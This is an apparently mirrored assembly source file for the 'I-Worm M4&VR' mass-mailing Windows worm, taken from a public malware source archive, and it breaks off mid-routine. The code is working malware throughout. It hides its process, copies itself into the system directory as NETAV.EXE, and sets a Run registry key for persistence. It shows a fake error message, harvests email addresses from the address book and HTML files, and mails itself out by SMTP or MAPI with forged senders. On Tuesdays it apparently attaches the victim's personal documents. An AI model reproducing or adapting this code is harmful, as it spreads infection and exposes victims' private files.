mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 21:05:28 +00:00
2049 lines
55 KiB
NASM
2049 lines
55 KiB
NASM
|
;-----------------------------------------------------------------------------
|
|||
|
;------------------------------- -----------------------------------------
|
|||
|
;----------------------------- ---------------------------------------
|
|||
|
;--------------------------- I-Worm M4&VR ------------------------------------
|
|||
|
;----------------------------- ---------------------------------------
|
|||
|
;------------------------------- -----------------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
.386p
|
|||
|
.model flat
|
|||
|
|
|||
|
;--------------------------- Include Zone ------------------------------------
|
|||
|
|
|||
|
MEM_COMMIT equ 00001000h
|
|||
|
MEM_RESERVE equ 00002000h
|
|||
|
PAGE_READWRITE equ 00000004h
|
|||
|
PAGE_READONLY equ 00000002h
|
|||
|
FILE_ATTRIBUTE_NORMAL equ 080h
|
|||
|
OPEN_EXISTING equ 03h
|
|||
|
FILE_SHARE_READ equ 01h
|
|||
|
GENERIC_READ equ 80000000h
|
|||
|
FILE_MAP_WRITE equ 00000002h
|
|||
|
FILE_MAP_READ equ 00000004h
|
|||
|
CREATE_ALWAYS equ 2
|
|||
|
GENERIC_WRITE equ 40000000h
|
|||
|
|
|||
|
;-------------------------- Macro Zone ---------------------------------------
|
|||
|
|
|||
|
@INIT_SehFrame macro Instruction
|
|||
|
local OurSeh
|
|||
|
call OurSeh
|
|||
|
mov esp,[esp+08h]
|
|||
|
Instruction
|
|||
|
OurSeh:
|
|||
|
xor edx,edx
|
|||
|
push dword ptr fs:[edx]
|
|||
|
mov dword ptr fs:[edx],esp
|
|||
|
endm
|
|||
|
|
|||
|
@REM_SehFrame macro
|
|||
|
xor edx,edx
|
|||
|
pop dword ptr fs:[edx]
|
|||
|
pop edx
|
|||
|
endm
|
|||
|
|
|||
|
@pushsz macro string
|
|||
|
local Str
|
|||
|
call Str
|
|||
|
db string,0
|
|||
|
Str: endm
|
|||
|
|
|||
|
api macro a
|
|||
|
extrn a:PROC
|
|||
|
call a
|
|||
|
endm
|
|||
|
|
|||
|
;------------------------ Constantes Zone ------------------------------------
|
|||
|
|
|||
|
SEH equ 1 ; SEH protection
|
|||
|
|
|||
|
NbEmailWanted equ 150 ; Nb Email to Seek >1
|
|||
|
EmailSize equ 64 ; Attention rol eax,6 (2^6)
|
|||
|
EmailFileSize equ (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security)
|
|||
|
NbToSend equ 20 ; Send x emails per session
|
|||
|
|
|||
|
NbPersoWanted equ 20 ; Nb Personal document to Seek
|
|||
|
PersoSize equ 256 ; Attention rol eax,8 (2^8)
|
|||
|
PersoFileSize equ (PersoSize*(NbPersoWanted+1)) ; For VirtualAlloc (+Security)
|
|||
|
|
|||
|
MimeHeaderSize equ 1024 ; Mime Header size
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;--------------------------- Code Zone ---------------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
.code
|
|||
|
|
|||
|
Mv:
|
|||
|
pushad
|
|||
|
|
|||
|
IF SEH
|
|||
|
@INIT_SehFrame <jmp ExitMv> ; Init SEH
|
|||
|
ENDIF
|
|||
|
|
|||
|
;------------------------- Check & Mark Presency -----------------------------
|
|||
|
|
|||
|
TryToOpenOurMutex:
|
|||
|
xor eax, eax
|
|||
|
@pushsz 'MvMutex' ; Mutex Name
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
api OpenMutexA ; already in mem
|
|||
|
or eax,eax
|
|||
|
jnz ExitMv ; Yes, do nothing more
|
|||
|
|
|||
|
CreateOurMutex:
|
|||
|
xor eax, eax
|
|||
|
@pushsz 'MvMutex' ; Mutex Name
|
|||
|
push eax ; No owner
|
|||
|
push eax ; default security attrib
|
|||
|
api CreateMutexA ; create Our Mutex
|
|||
|
mov dword ptr[MutexHdl], eax
|
|||
|
|
|||
|
;---------------------------- Random Init ------------------------------------
|
|||
|
|
|||
|
RandomInit:
|
|||
|
api GetTickCount
|
|||
|
mov RandomNb, eax
|
|||
|
|
|||
|
;---------------------- Hide Process on Win9x --------------------------------
|
|||
|
|
|||
|
HideProcess:
|
|||
|
@pushsz "KERNEL32.dll"
|
|||
|
api GetModuleHandleA
|
|||
|
@pushsz "RegisterServiceProcess" ; Error on NT
|
|||
|
push eax
|
|||
|
api GetProcAddress
|
|||
|
test eax, eax
|
|||
|
jz GetOurPathName
|
|||
|
push 01h
|
|||
|
push 00h
|
|||
|
call eax
|
|||
|
|
|||
|
;----------------------- Copy Worm in Sys Dir --------------------------------
|
|||
|
|
|||
|
GetOurPathName:
|
|||
|
xor eax, eax
|
|||
|
push eax
|
|||
|
api GetModuleHandleA ; Our Handle
|
|||
|
push 260
|
|||
|
push offset MyPath
|
|||
|
push eax
|
|||
|
api GetModuleFileNameA ; Our Path
|
|||
|
|
|||
|
CreateDestPath:
|
|||
|
push 260
|
|||
|
push offset TempPath&Name
|
|||
|
api GetSystemDirectoryA ; System Dir
|
|||
|
|
|||
|
@pushsz '\NETAV.EXE'
|
|||
|
push offset TempPath&Name
|
|||
|
api lstrcat ; Path+Name of File to Create
|
|||
|
|
|||
|
CheckHowExecuted:
|
|||
|
push offset MyPath
|
|||
|
push offset TempPath&Name
|
|||
|
api lstrcmp
|
|||
|
test eax, eax
|
|||
|
jz AutoRun
|
|||
|
|
|||
|
CreateOurFile:
|
|||
|
xor eax, eax
|
|||
|
push eax ; Overwrite mode set
|
|||
|
push offset TempPath&Name
|
|||
|
push offset MyPath
|
|||
|
api CopyFileA ; Copy Worm in Sys Dir
|
|||
|
|
|||
|
|
|||
|
;------------------------- Registry Worm -------------------------------------
|
|||
|
|
|||
|
RegWorm:
|
|||
|
push offset TempPath&Name
|
|||
|
api lstrlen
|
|||
|
push eax
|
|||
|
push offset TempPath&Name
|
|||
|
push 1
|
|||
|
@pushsz "NETAV Agent"
|
|||
|
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
|
|||
|
push 80000002h
|
|||
|
api SHSetValueA
|
|||
|
|
|||
|
;-------------------- First Launch Fake Message ------------------------------
|
|||
|
|
|||
|
FakeMessage:
|
|||
|
push 1040
|
|||
|
@pushsz 'Setup'
|
|||
|
@pushsz 'This file does not work on this system'
|
|||
|
push 0
|
|||
|
api MessageBoxA
|
|||
|
|
|||
|
;---------------------- Check Email File & Create ----------------------------
|
|||
|
AutoRun:
|
|||
|
|
|||
|
CheckEmailFile:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 260
|
|||
|
push offset TempPath&Name
|
|||
|
api GetSystemDirectoryA ; System Dir
|
|||
|
|
|||
|
push offset TempPath&Name
|
|||
|
api SetCurrentDirectoryA ; Set sys dir
|
|||
|
|
|||
|
push offset search ; Push it
|
|||
|
@pushsz 'ICMAIL.DLL' ; Mask
|
|||
|
api FindFirstFileA ; find file
|
|||
|
inc eax
|
|||
|
jnz UpDateEmailList ; The File Exist
|
|||
|
|
|||
|
call CreateEmailFile ; Create It if Does not exist
|
|||
|
|
|||
|
;----------------------- Check if Update Time --------------------------------
|
|||
|
|
|||
|
UpDateEmailList:
|
|||
|
lea esi,SystemTimeData
|
|||
|
push esi
|
|||
|
api GetSystemTime
|
|||
|
|
|||
|
movzx edx, word ptr[esi+4] ; Esi point day of week
|
|||
|
cmp edx, 4 ; Jeudi ?
|
|||
|
jne Check_if_Connected ; No
|
|||
|
|
|||
|
call CreateEmailFile ; Yes, Update Email File
|
|||
|
|
|||
|
;-------------------------- Spread the Worm ----------------------------------
|
|||
|
|
|||
|
Check_if_Connected:
|
|||
|
push offset SystemTimeData
|
|||
|
api GetSystemTime
|
|||
|
|
|||
|
push 0
|
|||
|
push offset IConnectedStateTemp
|
|||
|
api InternetGetConnectedState
|
|||
|
dec eax
|
|||
|
jnz No_internet ; No connection
|
|||
|
|
|||
|
call SendEmail ; Send Wab Emails + Rnd Email
|
|||
|
jmp ExitMvMutex ; Then Bye
|
|||
|
|
|||
|
No_internet:
|
|||
|
push 5*60*1000 ; 5 min
|
|||
|
api Sleep
|
|||
|
jmp Check_if_Connected
|
|||
|
|
|||
|
;----------------------------- The End ---------------------------------------
|
|||
|
|
|||
|
ExitMvMutex:
|
|||
|
push dword ptr[MutexHdl]
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
ExitMv:
|
|||
|
call FreeTheMem
|
|||
|
|
|||
|
IF SEH
|
|||
|
@REM_SehFrame ; Restore SEH
|
|||
|
ENDIF
|
|||
|
|
|||
|
popad
|
|||
|
|
|||
|
push 0
|
|||
|
api ExitProcess ; Quit
|
|||
|
|
|||
|
|
|||
|
db '---iworm.mv4&vr.by.tony/mvcrew---',0dh,0dh
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;------------------------- Sub Routine Zone ----------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
;........................ Major Sub Routine ..................................
|
|||
|
;............................ Z O N E ........................................
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
;...................... Create The Email File ................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
; OUT : Email File in System Dir : ICMAIL.DLL
|
|||
|
|
|||
|
CreateEmailFile:
|
|||
|
mov dword ptr[NbEmailFound], 0
|
|||
|
|
|||
|
ReserveMem_For_EmailListe:
|
|||
|
xor eax,eax
|
|||
|
push PAGE_READWRITE ; read/write page
|
|||
|
push MEM_RESERVE or MEM_COMMIT
|
|||
|
push EmailFileSize
|
|||
|
push eax ; System decide where
|
|||
|
api VirtualAlloc
|
|||
|
or eax,eax
|
|||
|
jz EmailFileError ; Alloc Fail
|
|||
|
mov dword ptr[EmailList], eax
|
|||
|
|
|||
|
EmailSeeker:
|
|||
|
call SearchWabFile_Email ; Search Email address book
|
|||
|
call SearchHtmFile_Email ; Search Email HTML
|
|||
|
|
|||
|
CreateTheEmailFile:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 260
|
|||
|
push offset TempPath&Name
|
|||
|
api GetSystemDirectoryA ; System Dir
|
|||
|
@pushsz '\ICMAIL.DLL'
|
|||
|
push offset TempPath&Name
|
|||
|
api lstrcat ; Path+Name of File to Create
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push CREATE_ALWAYS
|
|||
|
push eax
|
|||
|
push FILE_SHARE_READ
|
|||
|
push GENERIC_WRITE
|
|||
|
push offset TempPath&Name
|
|||
|
api CreateFileA
|
|||
|
inc eax
|
|||
|
jz EmailFileError
|
|||
|
dec eax
|
|||
|
mov [TempFileHandle], eax
|
|||
|
|
|||
|
push 0
|
|||
|
push offset ByteWritten
|
|||
|
push EmailFileSize ; Copy Listes d'Emails
|
|||
|
push dword ptr [EmailList]
|
|||
|
push [TempFileHandle]
|
|||
|
api WriteFile
|
|||
|
|
|||
|
push dword ptr [TempFileHandle]
|
|||
|
api CloseHandle
|
|||
|
|
|||
|
EmailFileError:
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;........................ Find Email in HTML .................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
; Recursive Search from Internet Path for Email in Html
|
|||
|
|
|||
|
SearchHtmFile_Email:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
push 00h
|
|||
|
push 20h ; Internet Path
|
|||
|
push offset TempPath&Name
|
|||
|
push 00h
|
|||
|
api SHGetSpecialFolderPathA
|
|||
|
|
|||
|
push offset TempPath&Name
|
|||
|
api SetCurrentDirectoryA ; Selected dir = Internet Path
|
|||
|
|
|||
|
lea eax, SeekHtmlCurrentDir
|
|||
|
mov dword ptr[RoutineToCall], eax
|
|||
|
call AllSubDirSearch ; Action = SeekHtmlCurrentDir
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Seek Html in Current Dir
|
|||
|
|
|||
|
; IN: Selected Current dir
|
|||
|
; OUT: Emails in reserved Mem
|
|||
|
|
|||
|
SeekHtmlCurrentDir:
|
|||
|
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
|
|||
|
je HtmlEmailSearchEnd ; YES...
|
|||
|
|
|||
|
lea edi, search
|
|||
|
push edi
|
|||
|
@pushsz '*.*htm*'
|
|||
|
api FindFirstFileA
|
|||
|
inc eax
|
|||
|
jne SeekEmail_Html
|
|||
|
ret
|
|||
|
|
|||
|
SeekEmail_Html:
|
|||
|
dec eax
|
|||
|
xchg eax,esi
|
|||
|
|
|||
|
SeekEmail_Html_Loop:
|
|||
|
|
|||
|
call SeekEmail_In_ThisHtml ; Parse Html 4 emails
|
|||
|
|
|||
|
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
|
|||
|
je HtmlEmailSearchFin ; YES...
|
|||
|
|
|||
|
push edi
|
|||
|
push esi
|
|||
|
api FindNextFileA
|
|||
|
dec eax
|
|||
|
je SeekEmail_Html_Loop
|
|||
|
|
|||
|
HtmlEmailSearchFin:
|
|||
|
push esi
|
|||
|
api FindClose
|
|||
|
HtmlEmailSearchEnd:
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Parse Html for emails
|
|||
|
|
|||
|
SeekEmail_In_ThisHtml:
|
|||
|
pushad
|
|||
|
push 0
|
|||
|
push FILE_ATTRIBUTE_NORMAL
|
|||
|
push OPEN_EXISTING
|
|||
|
push 0
|
|||
|
push FILE_SHARE_READ
|
|||
|
push GENERIC_READ
|
|||
|
lea eax, [search.FileName]
|
|||
|
push eax
|
|||
|
api CreateFileA
|
|||
|
inc eax
|
|||
|
je HtmlEmailSearchEnd ; Only ret for the call
|
|||
|
dec eax ; Not the total end
|
|||
|
xchg eax,ebx
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push PAGE_READONLY
|
|||
|
push eax
|
|||
|
push ebx
|
|||
|
api CreateFileMappingA
|
|||
|
test eax,eax
|
|||
|
je CloseHtmlHandle
|
|||
|
xchg eax,ebp
|
|||
|
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push FILE_MAP_READ
|
|||
|
push ebp
|
|||
|
api MapViewOfFile
|
|||
|
test eax,eax
|
|||
|
je CloseHtml_MapHandle
|
|||
|
xchg eax,esi
|
|||
|
mov [maphandlemail],esi
|
|||
|
mov [esi_save],esi
|
|||
|
|
|||
|
push 0
|
|||
|
push ebx
|
|||
|
api GetFileSize
|
|||
|
xchg eax,ecx
|
|||
|
jecxz CloseHtml_MapViewHandle
|
|||
|
inc ecx
|
|||
|
jz CloseHtml_MapViewHandle ; GetFileSize Error ?
|
|||
|
dec ecx
|
|||
|
FixBugOverflow:
|
|||
|
sub ecx, 8
|
|||
|
cmp ecx, 0
|
|||
|
jl CloseHtml_MapViewHandle
|
|||
|
|
|||
|
SeekMailToStr:
|
|||
|
mov esi,[esi_save]
|
|||
|
call MTStr
|
|||
|
db 'mailto:'
|
|||
|
MTStr:
|
|||
|
pop edi
|
|||
|
|
|||
|
ScanFor_MailTo:
|
|||
|
pushad
|
|||
|
push 7
|
|||
|
pop ecx
|
|||
|
rep cmpsb ; search for "mailto:"
|
|||
|
popad ; string
|
|||
|
je MailToFound_CheckEmail ; check the mail address
|
|||
|
inc esi
|
|||
|
dec ecx
|
|||
|
jnz ScanFor_MailTo
|
|||
|
|
|||
|
CloseHtml_MapViewHandle:
|
|||
|
push [maphandlemail]
|
|||
|
api UnmapViewOfFile
|
|||
|
CloseHtml_MapHandle:
|
|||
|
push ebp
|
|||
|
api CloseHandle
|
|||
|
CloseHtmlHandle:
|
|||
|
push ebx
|
|||
|
api CloseHandle
|
|||
|
popad
|
|||
|
ret
|
|||
|
|
|||
|
MailToFound_CheckEmail:
|
|||
|
inc esi
|
|||
|
mov [esi_save],esi
|
|||
|
dec esi
|
|||
|
|
|||
|
mov edi, dword ptr [EmailList]
|
|||
|
mov edx, dword ptr [NbEmailFound]
|
|||
|
rol edx, 6 ; 64 = email size stockage
|
|||
|
add edi, edx ; goto next place
|
|||
|
|
|||
|
mov [EmailCurrentPos], edi
|
|||
|
|
|||
|
xor edx,edx
|
|||
|
add esi,7
|
|||
|
push edi ; mail address
|
|||
|
|
|||
|
NextChar:
|
|||
|
lodsb
|
|||
|
cmp al, ' '
|
|||
|
je SkipChar
|
|||
|
|
|||
|
cmp al, '"' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
cmp al, '?' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
cmp al, '>' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
cmp al, '<' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
cmp al, ']' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
cmp al, '''' ; eMail End ?
|
|||
|
je EndChar
|
|||
|
|
|||
|
cmp al, '@' ; Valid email ?
|
|||
|
jne CopyChar
|
|||
|
inc edx
|
|||
|
CopyChar:
|
|||
|
stosb
|
|||
|
jmp NextChar
|
|||
|
SkipChar:
|
|||
|
inc esi
|
|||
|
jmp NextChar
|
|||
|
EndChar:
|
|||
|
xor al,al
|
|||
|
stosb
|
|||
|
pop edi
|
|||
|
test edx,edx ; if EDX=0, mail is not
|
|||
|
je SeekMailToStr ; valid (no '@')
|
|||
|
|
|||
|
cmp dword ptr [NbEmailFound], 0
|
|||
|
je NoEmailYet
|
|||
|
|
|||
|
mov edi, [EmailCurrentPos]
|
|||
|
mov eax, [edi]
|
|||
|
sub edi, 64
|
|||
|
cmp eax, [edi]
|
|||
|
je SeekMailToStr
|
|||
|
|
|||
|
NoEmailYet:
|
|||
|
inc dword ptr [NbEmailFound]
|
|||
|
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
|
|||
|
je CloseHtml_MapViewHandle ; YES...
|
|||
|
|
|||
|
jmp SeekMailToStr ; get next email address
|
|||
|
|
|||
|
|
|||
|
;........................ Find Email in WAB ..................................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
SearchWabFile_Email:
|
|||
|
call Clear_TempPath&Name
|
|||
|
|
|||
|
GetWabPath:
|
|||
|
mov dword ptr[KeySize], 260 ; Init Size to get
|
|||
|
|
|||
|
push offset KeySize
|
|||
|
push offset TempPath&Name
|
|||
|
push offset Reg
|
|||
|
push 0
|
|||
|
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name"
|
|||
|
push 80000001h
|
|||
|
api SHGetValueA
|
|||
|
test eax, eax
|
|||
|
jne EndWab
|
|||
|
|
|||
|
Open&Map_WabFile:
|
|||
|
call Open&MapFile
|
|||
|
jc EndWab
|
|||
|
|
|||
|
WabSearchEmail:
|
|||
|
mov ecx, [eax+64h] ; Nb of address
|
|||
|
jecxz WabUnmapView ; No address
|
|||
|
mov dword ptr[NbEmailFound], ecx ; For the Html search
|
|||
|
mov [NbWabEmail],ecx ; For the emailfile
|
|||
|
TruncFriend:
|
|||
|
cmp ecx, NbEmailWanted ; Too many Friend
|
|||
|
jbe NotManyFriend
|
|||
|
mov ecx, NbEmailWanted ; To many @, reduce it
|
|||
|
dec ecx ; for Html search (inc [NbEmailFound]!)
|
|||
|
mov dword ptr[NbEmailFound], ecx ; For the Html search
|
|||
|
mov [NbWabEmail],ecx ; For the emailfile
|
|||
|
NotManyFriend:
|
|||
|
mov esi, [eax+60h] ; email @ array
|
|||
|
add esi, eax ; normalise
|
|||
|
mov edi, dword ptr[EmailList] ; where store email
|
|||
|
|
|||
|
GetWabEmailLoop:
|
|||
|
call StockWabEmail
|
|||
|
dec ecx
|
|||
|
jnz GetWabEmailLoop
|
|||
|
|
|||
|
WabUnmapView:
|
|||
|
call Open&MapFileUnmapView
|
|||
|
|
|||
|
EndWab:
|
|||
|
ret
|
|||
|
|
|||
|
StockWabEmail:
|
|||
|
push ecx esi
|
|||
|
push 40h
|
|||
|
pop ecx
|
|||
|
cmp byte ptr [esi+1],0
|
|||
|
jne StockWabEmailLoop
|
|||
|
|
|||
|
StockWabEmailUnicodeLoop:
|
|||
|
lodsw ; Unicode
|
|||
|
stosb ; Ansi
|
|||
|
dec ecx
|
|||
|
test al, al
|
|||
|
jne StockWabEmailUnicodeLoop
|
|||
|
add edi, ecx ; next email field in Dest
|
|||
|
pop esi ecx
|
|||
|
add esi, 44h ; next email field in Wab
|
|||
|
ret
|
|||
|
|
|||
|
StockWabEmailLoop:
|
|||
|
movsb ; Ansi
|
|||
|
dec ecx
|
|||
|
test al, al
|
|||
|
jne StockWabEmailLoop
|
|||
|
add edi, ecx ; next email field in Dest
|
|||
|
pop esi ecx
|
|||
|
add esi, 24h ; next email field in Wab
|
|||
|
ret
|
|||
|
|
|||
|
;..................... Send Email SMTP or MAPI ...............................
|
|||
|
;.............................................................................
|
|||
|
|
|||
|
; OUT: Send via SMTP or MAPI #NbToSend Ramdom EmailAddress from EmailFile
|
|||
|
|
|||
|
|
|||
|
SendEmail:
|
|||
|
call MapEmailFile ; Map The Email File
|
|||
|
jnc HowToSend
|
|||
|
ret
|
|||
|
|
|||
|
HowToSend:
|
|||
|
mov byte ptr[SmtpFlag], 0 ; init flag to 0
|
|||
|
call GetUserSmtpServer ; Default Smtp Serveur Found ?
|
|||
|
jc MapiSendVersion ; No
|
|||
|
not byte ptr[SmtpFlag] ; flag = 1
|
|||
|
|
|||
|
MapiSendVersion:
|
|||
|
not byte ptr[SmtpFlag] ; flag=0 if SMTP, flag=1 -> MAPI
|
|||
|
|
|||
|
MapEmailFileOk:
|
|||
|
lea esi, SystemTimeData
|
|||
|
movzx ecx, word ptr[esi+4] ; Esi point day of week
|
|||
|
cmp ecx, 2 ; Mardi
|
|||
|
jne _NormalSend
|
|||
|
mov byte ptr[PayloadFlag], 1
|
|||
|
call PersonalDocSearch ; Personal doc path in mem
|
|||
|
|
|||
|
_NormalSend:
|
|||
|
call NormalSendInit ; init attachement 4 Normal Send
|
|||
|
|
|||
|
mov ebx, NbToSend ; Send NbToSend emails per session
|
|||
|
SendRandomEmailLoop:
|
|||
|
call SelectEmail ; return email ads in esi
|
|||
|
jecxz SendBye ; EmailFile empty or NonExploitable
|
|||
|
|
|||
|
lea edi, CurrentEmail ; <-----------------
|
|||
|
mov ecx, EmailSize ; |
|
|||
|
rep movsb ; Copy rnd Email in |
|
|||
|
|
|||
|
xor al, al
|
|||
|
sub esi, EmailSize
|
|||
|
xchg edi, esi
|
|||
|
mov ecx, EmailSize
|
|||
|
rep stosb ; Remove email sent in EmailFile
|
|||
|
|
|||
|
PaySendTime:
|
|||
|
cmp byte ptr[PayloadFlag], 0
|
|||
|
je NormalSend
|
|||
|
call PayloadSendInit ; Personals doc name in MyPath
|
|||
|
|
|||
|
NormalSend:
|
|||
|
call BuildMessageHeader ; build the mime header
|
|||
|
|
|||
|
cmp byte ptr[SmtpFlag], 0
|
|||
|
jne MapiSendIt ; flag=1 -> MAPI
|
|||
|
|
|||
|
call SmtpConnection
|
|||
|
jc MapiSendIt ; smtp error -> mapi send
|
|||
|
call SmtpSendCommand
|
|||
|
jc MapiSendIt ; smtp error -> mapi send
|
|||
|
call SmtpDisConnection
|
|||
|
jmp SendNext ; If here No Mapi Needed
|
|||
|
|
|||
|
MapiSendIt:
|
|||
|
call MapiSend
|
|||
|
|
|||
|
SendNext:
|
|||
|
cmp byte ptr[PayloadFlag], 0
|
|||
|
je NormalSendNext
|
|||
|
call ReleasePayMem
|
|||
|
NormalSendNext:
|
|||
|
call ClearHeaderMem
|
|||
|
dec ebx
|
|||
|
jnz SendRandomEmailLoop ; Send #NbToSend emails
|
|||
|
|
|||
|
SendBye:
|
|||
|
jmp Open&MapFileUnmapView ; Clean De-map EmailFile
|
|||
|
|
|||
|
|
|||
|
;.............. Select Email to Send
|
|||
|
|
|||
|
; OUT: esi point on the email
|
|||
|
; ecx = 0 if error
|
|||
|
; select first the email from the *.WAB
|
|||
|
|
|||
|
SelectEmail:
|
|||
|
mov ecx, NbEmailWanted
|
|||
|
inc ecx
|
|||
|
SelectIT:
|
|||
|
dec ecx
|
|||
|
jz SelectEmailError
|
|||
|
|
|||
|
mov esi, dword ptr [mapaddress] ; emails from file in memory
|
|||
|
|
|||
|
mov edi, NbEmailWanted ; Rnd Range
|
|||
|
call GetRndNumber ; Rnd Nb in edx
|
|||
|
|
|||
|
cmp dword ptr[NbWabEmail], 0
|
|||
|
je TriEMails
|
|||
|
|
|||
|
dec dword ptr[NbWabEmail]
|
|||
|
mov edx, dword ptr[NbWabEmail]
|
|||
|
|
|||
|
TriEMails:
|
|||
|
rol edx, 6 ; edx*emailsize (64)
|
|||
|
add esi, edx ; esi on the email
|
|||
|
|
|||
|
mov eax, dword ptr [esi]
|
|||
|
test eax, eax ; No empty email
|
|||
|
je SelectIT
|
|||
|
mov eax, dword ptr [esi]
|
|||
|
or eax, 20202020h ; Lower case
|
|||
|
cmp eax, 'mbew' ; No webmaster@xxxxxxxx
|
|||
|
je SelectIT
|
|||
|
mov eax, dword ptr [esi]
|
|||
|
or eax, 20202020h ; Lower case
|
|||
|
cmp eax, 'ptth' ; No http:\\xxxxxxxxxxx
|
|||
|
je SelectIT
|
|||
|
SelectEmailError:
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Normal Init The Attachement File
|
|||
|
|
|||
|
; Routine appel<65>e tout le temps (Payload ou pas) -> Init du mess: header + body
|
|||
|
|
|||
|
NormalSendInit:
|
|||
|
|
|||
|
InitWhoSendName:
|
|||
|
call ResMemHeader ; Some Mem for the mime header
|
|||
|
|
|||
|
mov dword ptr[KeySize], 00000040h ; Init Size to get
|
|||
|
|
|||
|
push offset KeySize
|
|||
|
push offset mailfrom
|
|||
|
push offset Reg
|
|||
|
@pushsz "SMTP Email Address" ; User mail (for mail from:)
|
|||
|
lea eax, AccountKey
|
|||
|
push eax
|
|||
|
push 80000001h
|
|||
|
api SHGetValueA
|
|||
|
test eax, eax
|
|||
|
je InitWormName
|
|||
|
mov byte ptr[UserEmailFoundFlag], 1
|
|||
|
|
|||
|
InitWormName:
|
|||
|
xor al,al
|
|||
|
mov ecx,260
|
|||
|
lea edi, MyPath
|
|||
|
rep stosb
|
|||
|
|
|||
|
push 260
|
|||
|
push offset MyPath
|
|||
|
api GetSystemDirectoryA ; System Dir
|
|||
|
|
|||
|
@pushsz '\NETAV.EXE'
|
|||
|
push offset MyPath
|
|||
|
api lstrcat ; Path+Name 4 Mapi Send&Smtp CodeB64File
|
|||
|
|
|||
|
SmtpNormalSendInit:
|
|||
|
call CodeB64File ; return worm file encoded in mem
|
|||
|
|
|||
|
ret
|
|||
|
|
|||
|
;.............. Build Message Header
|
|||
|
|
|||
|
BuildMessageHeader:
|
|||
|
push ebx ; for the loop
|
|||
|
|
|||
|
cmp byte ptr[UserEmailFoundFlag], 0
|
|||
|
je BuildHeader
|
|||
|
|
|||
|
CreateNameFrom:
|
|||
|
xor al, al
|
|||
|
lea edi, mailfrom
|
|||
|
mov ecx, EmailSize
|
|||
|
rep stosb
|
|||
|
|
|||
|
push NbFromName ; nb name
|
|||
|
pop edi
|
|||
|
call GetRndNumber ; edx = rnd nb
|
|||
|
|
|||
|
lea edi, RndFromNameTb
|
|||
|
rol edx, 2 ; table de dd
|
|||
|
add edi, edx ; Point the right Name offset
|
|||
|
mov edi, [edi]
|
|||
|
|
|||
|
push edi ; User mail not found -> fix another name
|
|||
|
push offset mailfrom
|
|||
|
api lstrcat
|
|||
|
|
|||
|
CreateServFrom:
|
|||
|
push NbFromServ ; nb serv
|
|||
|
pop edi
|
|||
|
call GetRndNumber ; edx = rnd nb
|
|||
|
|
|||
|
lea edi, RndFromServTb
|
|||
|
rol edx, 2 ; table de dd
|
|||
|
add edi, edx ; Point the right Serv offset
|
|||
|
mov edi, [edi]
|
|||
|
|
|||
|
push edi ; User mail not found -> fix another name
|
|||
|
push offset mailfrom
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildHeader:
|
|||
|
mov esi, dword ptr[MemMessageBody1] ; some mem
|
|||
|
|
|||
|
BuildFrom:
|
|||
|
@pushsz 'From: ' ; From:
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset mailfrom ; user mail or another fixed
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildTo:
|
|||
|
@pushsz 'To: ' ; To:
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push offset CurrentEmail ; Email found in *.wab or Html
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildSubject:
|
|||
|
@pushsz 'Subject: ' ; Subject:
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
push NbSubject ; nb Subject
|
|||
|
pop edi
|
|||
|
call GetRndNumber ; edx = rnd nb
|
|||
|
|
|||
|
lea edi, RndSubjectTb
|
|||
|
rol edx, 2 ; table de dd
|
|||
|
add edi, edx ; Point the right Subject offset
|
|||
|
mov edi, [edi]
|
|||
|
|
|||
|
push edi ; Rnd Subject
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
@pushsz CRLF
|
|||
|
push esi
|
|||
|
api lstrcat
|
|||
|
|
|||
|
BuildBody:
|
|||
|
